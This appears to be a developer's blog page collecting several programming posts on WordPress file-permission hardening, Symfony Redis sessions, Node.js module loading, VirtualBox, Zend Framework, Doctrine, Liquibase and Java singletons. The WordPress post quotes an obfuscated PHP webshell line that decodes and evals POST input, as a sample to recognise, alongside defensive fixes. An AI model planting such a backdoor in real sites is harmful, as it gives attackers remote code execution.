Solutions
My solutions…
Elasticsearch – SEARCH & ANALYZE DATA IN REAL TIME
How to avoid WordPress infected files by auditing file permissions?
Problem overview:
This is ture that WordPress engine has security flaws. It is true that WordPress plugins is written without taking care of security.
Recently I had to restore many WordPress instalations due to executing malicious code on servers (like a sending mail spam via sendmail).
But many hosting providers server’s configuration SUCKS! And I will explain you why.
First: WordPress could be attacked in many ways, we will cover one of them which is related with file permissions and wrong configuration.
Some example of executing malicious code
The most common example is creating many fucking infected *.php
files (like post_3be78.php) that executing code that has been injected in $_POST
request variable. These files has obfluscated content to be unable to recognize for human eye. Example:
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n6769b6'])) {eval($s21(${$s20}['n6769b6']));}?>
The infected files may contain more cynical content but you will recognize this crap at first glance.
Server providers SUCKS!
Server providers sucks.
Thats because they runs PHP scripts from the same user that uploaded file (FTP user).
Extremely important fact:
If your scripts are executed from the FTP user = you have trouble.
How to check if your hosting provider sucks?
- Simply create a new directory via FTP.
Make sure that it have default 755 permisions, means only owner user of the directory has permissions to write new files on it. - Create a new file test.php with content below and upload to that directory:
- Show file output result by accessing it via HTTP.
http://your-site/test/test.php
If the result is bool(true)
, the script have access to write any file to directory which exisis in. Yes? DAFUQ? Who agreed to it?
The second var_dump returns the user that executes this script. If this user is the same user that is your
FTP user, the result is correct, because this user is the owner or created directory and can write to it any files.
What does it means?
Any script file executed on
server have global permissions to write anywhere. It is security flaw of server configuration.
Sevrals years ago there was a standard that it have been required to set a chmod to directories/files where we permits to write.
How to avoid server configuration security flaw?
- You are hosting provider customer.Cannot. You have you ask your administrators that they can run your php scripts as different user that is your FTP user.If they disagree, get the fuck out of your hosting provider and look up for another. Wojciech is providing such services.
- If you are administrator, just set another user to run your php scripts.
For Apache example:
Edit file /etc/apache2/envvars (or wherever you have this crap)
export APACHE_RUN_USER=www-data export APACHE_RUN_GROUP=www-data
For Nginx + php-fpm
Edit your pool configuration:
[your-pool-name] user = www-data group = www-data
Temporary fix in .htaccess
Most of infected files that executes malicious code is beeing populated by $_POST requests. This is because of more much code can be send via HTTP POST request payload, because GET payload size is limited.
You can temporarly disable POST requests to URL’s that you don’t want to receive POST requests. This will block all new infected files, because you are creating a white list, not black list.
Example .htaccess file, this responds Error 404 while sending POST requests on urls different from /wp-login.php
and /wp-admin*
# BEGIN WordPress RewriteEngine On RewriteBase / #POST requests disable RewriteCond %{REQUEST_METHOD} POST [NC] RewriteCond %{REQUEST_URI} !^/wp-login.php [NC] RewriteCond %{REQUEST_URI} !^/wp-admin [NC] RewriteRule .* - [R=404,L] RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress
That all. I hope it helped.
Can I do more?
Yes.
Symfony2 Redis Session Handler
Context
When you scale a PHP
application you have to consider several aspects of runtime environment such us:
- Bytecode caching (e.x. APC or Zend Optimizer Plus or eAccelerator), more;
- Reading project files from RAM instead of HDD;
- Caching and minify static content etc.
- One additional aspect is storing sessions.
By default, PHP stores sessions in files. There are also several approaches to speed up saving sessions, such us memcached, mapping save_path folder as ramdisc, etc.
In scaling approaches there is important that many worker nodes (with deployed application) runs the same code, round-robin selected or load-ballanced, but have the same space to store sessions, because there is no guarantee in distributes architecture, that next user’s request will be handled by the same node. This implies, that session memory have to be shared between nodes, unfortunately storing these data in local
RAM doesn’t meet this requirement.
Redis as PHP Session Handler
One of additional approach to storing sessions in fast-memory is Redis – key-value store. This could be configured as centralized or distributed database.
There is available a Redis session_handler for PHP. To use it:
- install Redis first as a service [more]
- copy/compile redis.so PHP extension [more information]
- register an extension in php.ini configuration file
- reconfigure session.save_handler in your php.ini configuration file, or set it directly on runtime by writing for e.x.:
ini_set('session.save_handler', 'redis');
ini_set('session.save_path', 'tcp://localhost:6379');
Redis Session Handler in Symfony 2
I am using Symfony 2 framework. Unfortunately, 4th step don’t affects the application. You have to register own SessionHandler in config.yml file:
framework:
session:
handler_id: session_handler_redis
This configuration uses new SessionHandler registered ad session_handler_redis Symfony Service (more).
We have to write own SessionHandler in Symfony. I have found the Redis SessionHandler proposed by Andrej Hudec on GitHub (original code here). I have decided to use and improve existing implementation.
Declare new SessionHandler class somewhere in your project:
<?php
namespace Fokus\Webapp\CommonBundle\SessionHandler;
use \Symfony\Component\HttpFoundation\Session\Storage\Handler\NativeSessionHandler;
/**
* NativeRedisSessionStorage.
*
* Driver for the redis session save hadlers provided by the redis PHP extension.
*
* @see https://github.com/nicolasff/phpredis
*
* @author Andrej Hudec <pulzarraider@gmail.com>
* @author Piotr Pelczar <me@athlan.pl>
*/
class NativeRedisSessionHandler extends NativeSessionHandler
{
/**
* Constructor.
*
* @param string $savePath Path of redis server.
*/
public function __construct($savePath = "")
{
if (!extension_loaded('redis')) {
throw new \RuntimeException('PHP does not have "redis" session module registered');
}
if ("" === $savePath) {
$savePath = ini_get('session.save_path');
}
if ("" === $savePath) {
$savePath = "tcp://localhost:6379"; // guess path
}
ini_set('session.save_handler', 'redis');
ini_set('session.save_path', $savePath);
}
}
Now, add the entry that declares
the class as a Symfony Service in services.yml file:
services:
session_handler_redis:
class: Fokus\Webapp\CommonBundle\SessionHandler\NativeRedisSessionHandler
arguments: ["%session_handler_redis_save_path%"]
I have improved Andrzej’s code that you can configure the session handler calling it’s constructor and pass the Redis connection string just in services in Symfony, without touching ini_set or php.ini settings. As you see, the %session_handler_redis_save_path%
parameter has been used.
Now, declare the value of parameter in parameters.yml file:
session_handler_redis_save_path: tcp://localhost:6379
That’s all!
Just refresh your page, use the session such us in after loging and check out if it works. Type in command line:
redis-cli
and show all keys stored by PHP Session Handler. Keys begins with string PHPREDIS_SESSION:
.
KEYS PHPREDIS_SESSION*
Example output:
redis 127.0.0.1:6379> KEYS PHPREDIS_SESSION* 1) "PHPREDIS_SESSION:s4uvor0u5dcsq5ncgulqiuef14" 2) "PHPREDIS_SESSION:dcu54je80e6feo5rjqvqpv60h7"
Hope it helped!
Node.js – Load modules from specified directory recursive
Recently I have introducted Node.js and Express framework into my project which is very modular.
One of principles is that each functionality is encapsulated into a Controller known from web applications
frameworks like as Spring, Zend, Symfony, etc. Controller is nothing other than a function/method that will be executed, when the client’s HTTP request incomes.
It is very convenient to autoload all controllers from specified directory, which intends to register into URL routing registry. Assume, that all controllers exists in /src/Controller/
directory.
We could use the fs module from the Node.js standard library and call fs.readdir(path)
or fs.readdirSync(path)
, but methods doesn’t works recursive. There is a lot of methods to walk trought the directory tree, but I have used an existing wrench module written by Ryan McGrath.
The usage
of my ModuleLoader
moduleLoader.loadModulesFromDirectory(path, onLoadCallback)
where onLoadCallback is function(module, moduleName, filePath)
.
Code
exports.loadModulesFromDirectory = function(dir, onLoadCallback) {
require('wrench').readdirRecursive(dir, function(error, files) {
if(null === files)
return;
for(var i = 0, j = files.length; i < j; ++i) {
var file = files[i];
if(!file.match(/\.js$/))
continue;
var moduleName = file.substr(0, file.length - 3);
var filePath = dir + "/" + file;
var module = require(filePath);
onLoadCallback(module, moduleName, filePath);
}
});
}
Simple. Let’s use
this to load our Node.js and Express web application controllers:
1. Create the package.json
file:
{ "name": "hello-world", "description": "testapp", "dependencies": { "express": "3.2.6", "wrench": "1.5.1" } }
2. Create the server.js
file which will contain our web server:
var express = require('express'); var app = express(); var routes = require('./config/routes'); var port = process.env.port || 3000; console.log('Starting server at port ' + port); routes.setup(app); app.listen(port);
3. Define our ./config/routes.js
file:
function setup(app) {
var moduleLoader = require('ModuleLoader');
var path = __dirname + "/../src/Controller";
moduleLoader.loadModulesFromDirectory(path, function(module, moduleName, filePath) {
var loadingState = "";
if(typeof module.registerAutoload === 'function') {
module.registerAutoload(app);
loadingState = "OK";
}
else {
loadingState = "FAILED";
}
console.log("Loading Controller >> " + moduleName + " >> from file " + filePath + ": " + loadingState + ".");
});
}
exports.setup = setup;
4. And the last one… create our test controller in ./src/Controller/Test.js
:
actionHello = function(req, res) {
res.end('Hello! Server date: ' + new Date());
}
exports.registerAutoload = function(app) {
app.get('/hello', actionHello);
}
If controller’s intention is not to autoload, just don’t implement exports.registerAutoload
method. It works like the autoloading controllers from specified namespace in Spring Framework to look up for classes with @Controller
annotation.
5. Now run our app!
To install all dependencies, use npm (Node Packaged Modules):
npm install
After installing all dependencies, the node_modules wil be created. Now, ust run our app:
node server.js
Now, lunch: http://localhost:3000/hello
Pretty, isn’t it?
Hope it helped.
VirtualBox Linux server on Windows
Howdy! Recently I have faced the inconvenience that I have to develop parts of application beeing friendly-configurable on Linux and at the same time installing them on Windows is a nightmare.
What to do when do you develop on Windows, but you need the production environment based on Linux and you don’t want to buy server? Install Linux locally on Windows and run server on VirtualBox installed on Windows. The same story concerns the situation, when the production server have a lot of shit dependencies you don’t want to have on your developing environment, even it is Linux.
So how to connect VirtualBox Linux server from Windows?
- Download the VirtualBox and Linux distribution you want to install (.iso format will be convinience). I
have coised Ubuntu, because of rapid installation.
- Create a new virtual machine for your Linux. More info.
- Mount your .iso and install Linux on VirtualBox. Installation is really user-friendly.
- Now go to the setting of your virtual machine -> network adapters settings -> and change your network adapter to NAT. More info.
- Check if everything is ok, in particular that network adaper on virtual machine obtained the IP address. Just type:
/sbin/ifconfig
or:
/sbin/ifconfig | grep addr
Note the assigned IP address.
- Try to ping your virtual machine from host operating system, where VirtualBox is running:
ping virtaul_machine_ip_address
- If everything is ok, your machines works mutualy. Now, install Open SSH server on your linux. For ubuntu:
sudo apt-get install openssh-server
- Now, you can open the connection on your host device. On windows, you can use Putty for connect to the virtual machine’s command line.
My Ubuntu’s command line from Windows 8. Localy.
Happy coddin’!
ZF2 Translate in Controller
If you want to
use the translator in controller like in view, just like that:
$this->translate('Hello')
instead of ugly:
$this->getServiceLocator()->get('translator')->translate('Hello')
You have to write own controller plugin, just like view helper Zend\I18n\View\Helper\Translate
.
Of course, you can invoke the plugin with the same signature:
__invoke($message, $textDomain = null, $locale = null)
To register a new plugin, put these lines in your configuration module.config.php
:
'controller_plugins' => array(
'factories' => array(
'translate' => 'Application\Controller\Plugin\Translate',
),
),
Now, create your own plugin:
< ?php
namespace Application\Controller\Plugin;
use Zend\Mvc\Controller\Plugin\AbstractPlugin;
use Zend\ServiceManager\ServiceLocatorInterface;
use Zend\ServiceManager\FactoryInterface;
use Zend\I18n\Translator\Translator;
class Translate implements FactoryInterface
{
public function createService(ServiceLocatorInterface $serviceLocator)
{
$serviceLocator = $serviceLocator->getController()->getServiceLocator();
$serviceFactory = new TranslatorServiceFactory();
$translator = $serviceFactory->createService($serviceLocator);
return new TranslatorProxy($translator);
}
}
final class TranslatorProxy extends AbstractPlugin
{
private $translator;
public function __construct(Translator $translator)
{
$this->translator = $translator;
}
public function __invoke($message, $textDomain = 'default', $locale = null)
{
return $this->translator->translate($message, $textDomain, $locale);
}
public function __call($method, $args)
{
return call_user_func_array([$this->translator, $method], $args);
}
public static function __callstatic($method, $args)
{
return call_user_func_array([$this->translator, $method], $args);
}
}
How it works?
You see, the ServiceLocator
passed in
createService(ServiceLocatorInterface $serviceLocator)
factory in configuration space controller_plugins
, does have no access to the Config
service in ServiceLocator
in controller. So you cannot get the configuration and create the Translate
object via TranslatorServiceFactory
.
Instead of that, you can access to the ServiceLocator
assigned to the controller for which our helper has been invoked, by typing $serviceLocator->getController()
.
Of course, $serviceLocator
passed in createService
method is instance of Zend\Mvc\Controller\PluginManager
.
Why proxy?
The object returned via plugin factory has to implement
Zend\Mvc\Controller\Plugin\PluginInterface
which is abstractly implemented in
Zend\Mvc\Controller\Plugin\AbstractPlugin
so we created proxy object to forward all calls from our plugin to the Translate
object.
Hope it helped!
How to set ID Doctrine2 manually
I faced the
problem with preserving manually setted ID’s of records represented by entities having id
with auto generate strategy.
If for some reasons you really want to set the ID manually either
rely on generating strategy (@GeneratedValue strategy
), you have to set:
@GeneratedValue(strategy="NONE")
But if your application rely on auto identifiers creation (@GeneratedValue(strategy="AUTO")
) and you have to exceptionally set the ID manually (e.x. for synchronization), you have to change the strategy dynamicaly by injecting it into meta object of entity:
$metadata = $this->entityManager->getClassMetaData(get_class($entity));
$metadata->setIdGenerator(new \Doctrine\ORM\Id\AssignedGenerator());
Where $entity
is enetity you want to persist and there is an working entity manager under $this->entityManager
.
Liquibase: How to store PostgreSQL procedures and triggers
Liquibase is an open source, database-independent library for tracking, managing and applying database changes written in Java and distributed as JAR (Java archive). There are many tools to version code, most popular: SVN, GIT, Mercurial.
Many product managers faced the problem with versioning the database during application development. The solution is Liquibase.
Although tool is very usefull (it can track changes related with tables, views, columnt, indexes, foreigns), there are few limitations. One of these there is stored procedures. Liquibase cannot track stored procedures depends on database. The solution is to use custom query executon avaliable in liquibase.
To create custom stored procedure in Liquibase, just make a simple XML file (testChanges.xml):
<?xml version="1.0" encoding="UTF-8" standalone="no"?> <databaseChangeLog xmlns="http://www.liquibase.org/xml/ns/dbchangelog" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.liquibase.org/xml/ns/dbchangelog http://www.liquibase.org/xml/ns/dbchangelog/dbchangelog-2.0.xsd"> <preConditions> <dbms type="postgresql" /> </preConditions> <changeSet author="Athan (generated)" id="1360329703893-1-1"> <createProcedure> CREATE OR REPLACE FUNCTION TestFunction() RETURNS trigger AS $proc$ BEGIN ... END $proc$ LANGUAGE plpgsql; </createProcedure> </changeSet> </databaseChangeLog>
And type:
liquibase --changeLogFile testChanges.xml --url=jdbc:postgresql://localhost:5432/dbname --username=postgres --password=root update
Your procedure will appear in database.
WARNING! You should remember that Liquibase provides rollback to version, tag or count of changes. For custom SQL there are no rollback actions (such us for create table – drop table). You have to provide a rollback SQL.
So just add a <rollback>
tag to yout changeSet:
<rollback> DROP FUNCTION TableOffersStateRealisedUpdate(); </rollback>
Whole XML should look like:
<?xml version="1.0" encoding="UTF-8" standalone="no"?> <databaseChangeLog xmlns="http://www.liquibase.org/xml/ns/dbchangelog" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.liquibase.org/xml/ns/dbchangelog http://www.liquibase.org/xml/ns/dbchangelog/dbchangelog-2.0.xsd"> <preConditions> <dbms type="postgresql" /> </preConditions> <changeSet author="Athan (generated)" id="1360329703893-1-1"> <createProcedure> CREATE OR REPLACE FUNCTION TestFunction() RETURNS trigger AS $proc$ BEGIN ... END $proc$ LANGUAGE plpgsql; </createProcedure> <rollback> DROP FUNCTION TableOffersStateRealisedUpdate(); </rollback> </changeSet> </databaseChangeLog>
Same case with triggers:
<changeSet author="Athan (generated)" id="1360329703893-2-1"> <sql> CREATE TRIGGER "tableoffersstaterealisedupdate" AFTER INSERT OR UPDATE ON "public"."offers" FOR EACH ROW EXECUTE PROCEDURE "tableoffersstaterealisedupdate"(); </sql> <rollback> DROP TRIGGER "tableoffersstaterealisedupdate" ON "public"."offers" </rollback> </changeSet>
Hope this helped you.
Double-checked locking with Singleton pattern in Java
I just faced problem with synchronization many threads starting at the same time (with microseconds difference) and creating single object instance of connection to the database using a Singleton Pattern in Java. As a result I had many connections except one. The sent queries counter has been set to smaller value as excepted in simulations.
I have just Google’d the IBM article by Peter Haggar, Senior Software Engineer „Double-checked locking and the Singleton pattern”.
Problem overview
Creating an singleton in Java is simple to implement. There are two common ways to create singleton:
- Lazy loaded with create an
private static
field_instance
filled bynull
(by default Java object initialization). The instance is created, when thestatic
methodgetInstance()
is called. - Create an class instance in advance, just before class is loaded to memory by declaring a value of
priate static
field_instance
by calling theprivate
constructornew SingletonClass();
1st implementation with lazy initialization
package pl.athlan.examples.singleton;
public class Singleton {
private static Singleton _instance; // null by default
private Singleton() {
}
public static Singleton getInstance() {
if(_instance == null) {
_instance = new Singleton();
}
return _instance;
}
}
2nd implementation with eager initialization
package pl.athlan.examples.singleton;
public class Singleton {
private static Singleton _instance = new Singleton(); // object is created just after class is loaded into memory
private Singleton() {
}
public static Singleton getInstance() {
return _instance;
}
}
Motivation.
Imagine two separated threads with is delegated to call getInstance() method at the same time.
Thread #1 | Thread #2 | value of _instance |
---|---|---|
Singleton.getInstance() |
null |
|
Singleton.getInstance() |
null |
|
if(_instance == null) |
null |
|
if(_instance == null) |
null |
|
_instance = new Singleton() |
[object #1] |
|
_instance = new Singleton() |
[object #2] |
As a result, two object has been created, because thread #2 hasn’t noticed the object creation.
If your object stores common data like a (in my case) database queries counter or the creation of the object is time-expensive when the system just hang out for many threads – this situation have not to occur.
Sloving the problem.
The problem slove is to synchronize the threads while accessing getInstace method. You can simply write:
public static synchronized Singleton getInstance()
but this solution produces an huge overhead to synchronize all threads calling this method. The better solution is to synchronize the fragment of code which checks an existance and creates the object in fact, except of returing if it already exists.
Finally solution:
package pl.athlan.examples.singleton;
public class Singleton {
private volatile static Singleton _instance;
private Singleton() {
}
public static Singleton getInstance() {
if(_instance == null) {
// causes that this block will be processed in sequence in parallel computing mode
synchronized(Singleton.class) {
// if previous sequence created the instance, just omit object creation
if(_instance == null) {
_instance = new Singleton();
}
}
}
return _instance;
}
}
The volatile
keyword assigned to _instance
field provides the synchronization.
If there is no instance of the object, the synchronized block will begin. It means that all processes are queued to access that block. After access just ensure one more time, if the single object is not exists in fact, because the process doesn’t know what happened before it has rached the queue. If any process before queueing has created the object, just ommit the creation.
Hope it helped!
NOTE: Note that implementing Singleton by an ENUM is thread-safe and reflection-safe.